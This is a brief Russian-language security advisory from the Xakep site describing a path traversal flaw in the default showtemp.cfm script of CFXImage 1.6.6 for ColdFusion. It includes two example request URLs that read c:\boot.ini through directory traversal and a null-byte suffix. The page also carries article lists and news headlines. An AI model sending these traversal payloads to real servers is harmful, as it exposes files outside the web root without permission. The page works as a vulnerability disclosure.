Просмотр произвольных файлов в ColdFusion CFXImage

Рекомендуем почитать:

Xakep #304. IP-камеры на пентестах

Содержание выпуска
Подписка на «Хакер»-60%

CFXImage - тэг ColdFusion для редактирования и создания изображений. Уязвимость защиты в программе позволяет злоумышленнику
просматривать содержание файлов вне HTML корня.

Программа showtemp.cfm, поставляемая по умолчанию, не фильтрует
входные переменные, позволяя обходить разрешенные директории и читать файлы вне www корня. Пример:

http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini

или

http://www.server.com/docs/showtemp.cfm?TYPE=JPEG&FILE=../../../../../../../../../..boot.ini%00

Уязвимость обнаружена в CFXImage versions 1.6.6.

Просмотр произвольных файлов в ColdFusion CFXImage

Xakep #304. IP-камеры на пентестах

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Пробив веба. Как я обошел 2FA и захватил учетки пользователей

Нанодамп. Как я заново изобрел SafetyKatz для дампа LSASS с NanoDump

Шишинг с Rogue RDP. Используем встроенные средства Windows для проникновения в сеть

HTB Blazorized. Ломаем сайт на веб-платформе Blazor

Трюки

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Карманный Arch. Делаем флешку с живым образом Arch Linux

Последние новости

В РКН прокомментировали информацию об учениях по отключению от зарубежного интернета

Опубликован дешифровщик для вымогателя ShrinkLocker

ИИ на устройствах Pixel проанализирует телефонные разговоры в поисках мошенничества

Опубликован список самых атакуемых уязвимостей 2023 года

D-Link снова отказалась исправлять критический баг, теперь в 60 000 роутеров